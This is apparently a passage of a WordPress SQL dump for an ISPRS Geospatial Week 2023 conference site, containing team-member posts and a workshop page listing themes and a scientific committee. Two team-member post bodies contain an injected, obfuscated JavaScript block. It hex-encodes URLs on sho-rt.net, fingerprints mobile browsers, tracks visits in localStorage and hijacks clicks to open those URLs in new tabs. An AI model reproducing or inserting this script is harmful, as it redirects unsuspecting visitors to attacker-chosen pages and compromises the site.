_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. Ahmed Shaker','','publish','open','closed','','prof-dr-ahmed-shaker','','','2022-11-04 20:23:47','2022-11-04 20:23:47','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2989',0,'dt_team','',0),
(2990,1,'2022-11-04 20:23:33','2022-11-04 20:23:33','','ws191','','inherit','open','closed','','ws191','','','2022-11-04 20:23:33','2022-11-04 20:23:33','',2989,'https://gsw2023.com/wp-content/uploads/2022/11/ws191.jpg',0,'attachment','image/jpeg',0),
(2991,1,'2022-11-04 20:25:20','2022-11-04 20:25:20','<!-- wp:paragraph -->\n<p>University of New Brunswick</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr. Shabnam Jabari','','publish','open','closed','','dr-shabnam-jabari','','','2022-11-04 20:25:22','2022-11-04 20:25:22','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2991',0,'dt_team','',0),
(2992,1,'2022-11-04 20:25:08','2022-11-04 20:25:08','','ws192','','inherit','open','closed','','ws192','','','2022-11-04 20:25:08','2022-11-04 20:25:08','',2991,'https://gsw2023.com/wp-content/uploads/2022/11/ws192.jpg',0,'attachment','image/jpeg',0),
(2993,1,'2022-11-04 20:29:26','2022-11-04 20:29:26','[vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\r\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3005\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"55\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>Data Accessibility for Smart Cities and Remote Sensing</li>\r\n 	<li>Data Preparation for Geospatial or Remote Sensing Applications</li>\r\n 	<li>Data Management for Geospatial or Remote Sensing Applications</li>\r\n 	<li>AI Methods to support Geospatial and Remote Sensing Data Preparation or Data Management</li>\r\n 	<li>Database Support for Convolutional Neural Networks and Image Classification</li>\r\n 	<li>Multi-Dimensional (3D/4D/nD) Geospatial Data Modelling and Management</li>\r\n 	<li>nD Data Cubes</li>\r\n 	<li>Big Geospatial Data: Preparation, Modelling and Management</li>\r\n 	<li>Spatio-Temporal and Trajectory Data Management</li>\r\n 	<li>Geospatial Data Streaming and Data Management for Geo-Sensor Networks</li>\r\n 	<li>Data Management for Real-Time Scenarios such as Traffic Simulation and Smart Cities</li>\r\n 	<li>Data Integration for Building Information Models (BIM) and 3D GIS</li>\r\n 	<li>Advanced Data Management Applications: Smart Environment/Cities, Digital Twins, Intelligent Transportation, Convolutional Neural Networks and Image Classification in Remote Sensing</li>\r\n 	<li>Internet of Vehicles (IOV) and Intelligent Transportation Systems (ITS)</li>\r\n 	<li>Geospatial Data Monetization</li>\r\n 	<li>Quality Aspects of Remote Sensing Data Operations (preparation, modelling, management, uncertainty)</li>\r\n 	<li>Remote Sensing for Better Future, Data Management and Quality Aspects of Environmental Monitoring including Biodiversity Analysis</li>\r\n</ul>\r\n<h5><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>Mulhim Al-Doori, Roads and Transport Authority, United Arab Emirates</li>\r\n 	<li>Arpad Barsi, Budapest University of Technology and Economics, Hungary</li>\r\n 	<li>Mike Batty, University College London, United Kingdom</li>\r\n 	<li>Peter Baumann, Jacobs University, Germany</li>\r\n 	<li>Filip Biljecki, National University of Singapore, Singapore</li>\r\n 	<li>Thomas Blaschke, Paris Lodron University Salzburg, Austria</li>\r\n 	<li>Patrick Bradley, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Martin Breunig, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Christophe Claramunt, Naval Academy Research Institute, France</li>\r\n 	<li>Volker <a href=\"mailto:alias@utm.my\">Coors,</a> HFT <em>Stuttgart<strong>, </strong></em>Germany</li>\r\n 	<li>Ihab Hamzi Hijazi, Technische Universität München, Germany</li>\r\n 	<li>Umit Isikdag, Istanbul Technical University, Turkey</li>\r\n 	<li>Mojgan A. Jadidi, York University, Canada</li>\r\n 	<li>Markus Jahn, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Zsófia Kugler, Budapest University of Technology and Economics, Hungary</li>\r\n 	<li>Paul Vincent Kuper, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Bassem Mokhtar, Egypt-Japan University of Science and Technology, Egypt</li>\r\n 	<li>Morakot Pilouk, ESRI Inc.,USA</li>\r\n 	<li>Jacynthe Pouliot, Laval University, Canada</li>\r\n 	<li>Alias Abdol Ramhan, University Technology Malaysia, Malaysia</li>\r\n 	<li>Friederike Reitze, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Norbert Rösch, Karlsruhe Institute of Technology, Germany</li>\r\n 	<li>Emmanuel Stefanakis, University of Calgary, Canada</li>\r\n 	<li>Gyorge Szabo, Budapest University of Technology and Economics, Hungary</li>\r\n 	<li>Rami Zewail, Egypt-Japan University of Science and Technology, Egypt</li>\r\n 	<li>Sisi Zlatanova, University of New South Wales, Australia</li>\r\n 	<li>Hussein M. Abdulmuttalib, Dubai Municipality, United Arab 